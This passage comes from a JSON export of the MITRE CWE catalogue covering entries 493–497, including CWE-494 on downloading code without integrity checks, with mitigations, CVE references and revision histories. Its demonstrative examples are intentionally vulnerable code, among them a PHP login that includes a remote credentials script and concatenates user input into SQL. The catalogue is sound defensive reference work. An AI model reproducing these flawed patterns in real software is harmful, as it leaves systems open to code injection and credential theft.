Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, References, Relationships"}],"Previous_Entry_Name":{"#text":"Mobile Code: Use of Inner Class","attr":{"@_Date":"2008-04-11"}}}},"493":{"attr":{"@_ID":"493","@_Name":"Critical Public Variable Without Final Modifier","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product has a critical public variable that is not final, which allows the variable to be modified to contain unexpected values.","Extended_Description":"If a field is non-final and public, it can be changed once the value is set by any function that has access to the class which contains the field. This could lead to a vulnerability if other parts of the program make assumptions about the contents of that field.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Background_Details":{"Background_Detail":["Mobile code, such as a Java Applet, is code that is transmitted across a network and executed on a remote machine. Because mobile code developers have little if any control of the environment in which their code will execute, special security concerns become relevant. One of the biggest environmental threats results from the risk that the mobile code will run side-by-side with other, potentially malicious, mobile code. Because all of the popular web browsers execute code from multiple sources together in the same JVM, many of the security guidelines for mobile code are focused on preventing manipulation of your objects\' state and behavior by adversaries who have access to the same virtual machine where your program is running.","Final provides security by only allowing non-mutable objects to be changed after being set. However, only objects which are not extended can be made final."]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Application Data","Note":"The object could potentially be tampered with."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The object could potentially allow the object to be read."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Declare all public fields as final when possible, especially if it is used to maintain internal state of an Applet or of classes used by an Applet. If a field must be public, then perform all appropriate sanity checks before accessing the field from your code."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Suppose this WidgetData class is used for an e-commerce web site. The programmer attempts to prevent price-tampering attacks by setting the price of the widget using the constructor.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public final class WidgetData extends Applet {}","xhtml:div":{"#text":"public float price;...public WidgetData(...) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"this.price = LookupPrice(\\"MyWidgetType\\");","attr":{"@_style":"margin-left:10px;"}}}}},"Body_Text":"The price field is not final. Even though the value is set by the constructor, it could be modified by anybody that has access to an instance of WidgetData."},{"Intro_Text":"Assume the following code is intended to provide the location of a configuration file that controls execution of the application.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":"public string configPath = \\"/etc/application/config.dat\\";"},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"public String configPath = new String(\\"/etc/application/config.dat\\");"}],"Body_Text":"While this field is readable from any function, and thus might allow an information leak of a pathname, a more serious problem is that it can be changed by any function."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Mobile Code: Non-Final Public Field"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to provide confidentiality for stored data"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ10-J","Entry_Name":"Do not use public static nonfinal variables"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Likelihood_of_Exploit, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Background_Details, Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Background_Details, Demonstrative_Examples, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Mobile Code: Non-final Public Field","attr":{"@_Date":"2008-04-11"}}}},"494":{"attr":{"@_ID":"494","@_Name":"Download of Code Without Integrity Check","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product downloads source code or an executable from a remote location and executes the code without sufficiently verifying the origin and integrity of the code.","Extended_Description":"An attacker can execute malicious code by compromising the host server, performing DNS spoofing, or modifying the code in transit.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"79","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability","Confidentiality","Other"],"Impact":["Execute Unauthorized Code or Commands","Alter Execution Logic","Other"],"Note":"Executing untrusted code could compromise the control flow of the program. The untrusted code could execute attacker-controlled commands, read or modify sensitive resources, or prevent the software from functioning correctly for legitimate users."}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-7.4"},"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual static analysis is typically required to find the behavior that triggers the download of code, and to determine whether integrity-checking methods are in use."]},"Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"attr":{"@_Detection_Method_ID":"DM-11"},"Method":"Black Box","Description":{"xhtml:p":["Use monitoring tools that examine the software\'s process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.","Attach the monitor to the process and also sniff the network connection. Trigger features related to product updates or plugin installation, which is likely to force a code download. Monitor when files are downloaded and separately executed, or if they are otherwise read back into the process. Look for evidence of cryptographic library calls that use integrity checking."]}}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-42"},"Phase":"Implementation","Description":"Perform proper forward and reverse DNS lookups to detect DNS spoofing.","Effectiveness_Notes":"This is only a partial solution since it will not prevent your code from being modified on the hosting site or in transit."},{"Phase":["Architecture and Design","Operation"],"Description":{"xhtml:p":["Encrypt the code with a reliable encryption scheme before transmitting.","This will only be a partial solution, since it will not detect DNS spoofing and it will not prevent your code from being modified on the hosting site."]}},{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Speficially, it may be helpful to use tools or frameworks to perform integrity checking on the transmitted code."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["When providing the code that is to be downloaded, such as for automatic updates of the software, then use cryptographic signatures for the code and modify the download clients to verify the signatures. Ensure that the implementation does not contain CWE-295, CWE-320, CWE-347, and related weaknesses.","Use code signing technologies such as Authenticode. See references [REF-454] [REF-455] [REF-456]."]}}}},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This example loads an external class from a local subdirectory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"URL[] classURLs= new URL[]{};URLClassLoader loader = new URLClassLoader(classURLs);Class loadedClass = Class.forName(\\"loadMe\\", true, loader);","xhtml:div":{"#text":"new URL(\\"file:subdir/\\")","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["",""]}},"Body_Text":"This code does not ensure that the class loaded is the intended one, for example by verifying the class\'s checksum. An attacker may be able to modify the class file to execute malicious code."},{"Intro_Text":"This code includes an external script to get database credentials, then authenticates a user against the database, allowing access to the application.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function authenticate($username,$password){}","xhtml:i":"//assume the password is already encrypted, avoiding CWE-312","xhtml:br":["","",""],"xhtml:div":{"#text":"include(\\"http://external.example.com/dbInfo.php\\");mysql_connect($dbhost, $dbuser, $dbpass) or die (\'Error connecting to mysql\');mysql_select_db($dbname);$query = \'Select * from users where username=\'.$username.\' And password=\'.$password;$result = mysql_query($query);if(mysql_numrows($result) == 1){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","",""],"xhtml:i":"//dbInfo.php makes $dbhost, $dbuser, $dbpass, $dbname available","xhtml:div":[{"#text":"mysql_close();return true;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"mysql_close();return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}},"Body_Text":["This code does not verify that the external domain accessed is the intended one. An attacker may somehow cause the external domain name to resolve to an attack server, which would provide the information for a false database. The attacker may then steal the usernames and encrypted passwords from real user login attempts, or simply allow themself to access the application without a real user account.","This example is also vulnerable to an Adversary-in-the-Middle AITM (CWE-300) attack."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-9534","Description":"Satellite phone does not validate its firmware image.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9534"},{"Reference":"CVE-2021-22909","Description":"Chain: router\'s firmware update procedure uses curl with \\"-k\\" (insecure) option that disables certificate validation (CWE-295), allowing adversary-in-the-middle (AITM) compromise with a malicious firmware image (CWE-494).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22909"},{"Reference":"CVE-2008-3438","Description":"OS does not verify authenticity of its own updates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3438"},{"Reference":"CVE-2008-3324","Description":"online poker client does not verify authenticity of its own updates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3324"},{"Reference":"CVE-2001-1125","Description":"anti-virus product does not verify automatic updates for itself.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1125"},{"Reference":"CVE-2002-0671","Description":"VOIP phone downloads applications from web sites without verifying integrity.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0671"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Invoking untrusted mobile code"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC06-J","Entry_Name":"Do not rely on the default automatic signature verification provided by URLClassLoader and java.util.jar"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP27","Entry_Name":"Tainted input to environment"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"184"}},{"attr":{"@_CAPEC_ID":"185"}},{"attr":{"@_CAPEC_ID":"186"}},{"attr":{"@_CAPEC_ID":"187"}},{"attr":{"@_CAPEC_ID":"533"}},{"attr":{"@_CAPEC_ID":"657"}},{"attr":{"@_CAPEC_ID":"662"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-454"}},{"attr":{"@_External_Reference_ID":"REF-455"}},{"attr":{"@_External_Reference_ID":"REF-456"}},{"attr":{"@_External_Reference_ID":"REF-457"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 18: The Sins of Mobile Code.&#34; Page 267"}},{"attr":{"@_External_Reference_ID":"REF-459"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":{"#text":"This is critical for mobile code, but it is likely to become more and more common as developers continue to adopt automated, network-based product distributions and upgrades. Software-as-a-Service (SaaS) might introduce additional subtleties. Common exploitation scenarios may include ad server compromises and bad upgrades.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Name, Other_Notes, Potential_Mitigations, References, Relationships, Research_Gaps, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Observed_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Detection_Factors, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Mobile Code: Invoking Untrusted Mobile Code","attr":{"@_Date":"2008-04-11"}},{"#text":"Download of Untrusted Mobile Code Without Integrity Check","attr":{"@_Date":"2009-01-12"}}]}},"495":{"attr":{"@_ID":"495","@_Name":"Private Data Structure Returned From A Public Method","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product has a method that is declared public, but returns a reference to a private data structure, which could then be modified in unexpected ways.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data","Note":"The contents of the data structure can be modified from outside the intended scope."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Declare the method private."},{"Phase":"Implementation","Description":"Clone the member data and keep an unmodified version of the data private to the object."},{"Phase":"Implementation","Description":"Use public setter methods that govern how a private member can be modified."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Here, a public method in a Java class returns a reference to a private array. Given that arrays in Java are mutable, any modifications made to the returned reference would be reflected in the original private array.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private String[] colors;public String[] getColors() {}","xhtml:br":"","xhtml:div":{"#text":"return colors;","attr":{"@_style":"margin-left:10px;"}}}}},{"Intro_Text":"In this example, the Color class defines functions that return non-const references to private members (an array type and an integer type), which are then arbitrarily altered from outside the control of the class.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"class Color{};int main (){}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"private:public:","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"int[2] colorArray;int colorValue;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"Color () : colorArray { 1, 2 }, colorValue (3) { };int[2] &amp; fa () { return colorArray; }int &amp; fv () { return colorValue; }","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":["// return reference to private array","// return reference to private integer"]}]},{"#text":"Color c;c.fa () [1] = 42;c.fv () = 42;return 0;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""],"xhtml:i":["// modifies private array element","// modifies private int"]}]}}}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Private Array-Typed Field Returned From A Public Method"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Name, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Private Array-Typed Field Returned From A Public Method","attr":{"@_Date":"2019-01-03"}}}},"496":{"attr":{"@_ID":"496","@_Name":"Public Data Assigned to Private Array-Typed Field","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Assigning public data to a private array is equivalent to giving public access to the array.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data","Note":"The contents of the array can be modified from outside the intended scope."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Do not allow objects to modify private members of a class."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the example below, the setRoles() method assigns a publically-controllable array to a private field, thus allowing the caller to modify the private array directly by virtue of the fact that arrays in Java are mutable.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private String[] userRoles;public void setUserRoles(String[] userRoles) {}","xhtml:br":"","xhtml:div":{"#text":"this.userRoles = userRoles;","attr":{"@_style":"margin-left:10px;"}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Public Data Assigned to Private Array-Typed Field"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP25","Entry_Name":"Tainted input to variable"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"497":{"attr":{"@_ID":"497","@_Name":"Exposure of Sensitive System Information to an Unauthorized Control Sphere","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application does not properly prevent sensitive system-level information from being accessed by unauthorized actors who do not have the same level of access to the underlying system as the application does.","Extended_Description":{"xhtml:p":["Network-based software, such as web applications, often runs on top of an operating system or similar environment.  When the application communicates with outside parties, details about the underlying system are expected to remain hidden, such as path names for data files, other OS users, installed packages, the application environment, etc. This system information may be provided by the application itself, or buried within diagnostic or debugging messages. Debugging information helps an adversary learn about the system and form an attack plan.","An information exposure occurs when system data or debugging information leaves the program through an output stream or logging function that makes it accessible to unauthorized parties. Using other weaknesses, an attacker could cause errors to occur; the response to these errors can reveal detailed system information, along with other impacts.  An attacker can use messages that reveal technologies, operating systems, and product versions to tune the attack against known vulnerabilities in these technologies. An application may use diagnostic methods that provide significant implementation details such as stack traces as part of its error handling mechanism."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Production applications should never use methods that generate internal details such as stack traces and error messages unless that information is directly committed to a log that is not viewable by the end user. All error message text should be HTML entity encoded before being written to the log file to protect against potential cross-site scripting attacks against the viewer of the logs"}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code prints the path environment variable to the standard error stream:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* path = getenv(\\"PATH\\");...sprintf(stderr, \\"cannot find exe on path %s\\\\n\\", path);","xhtml:br":["",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-68"},"Intro_Text":"This code prints all of the running processes belonging to the current user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$userName = 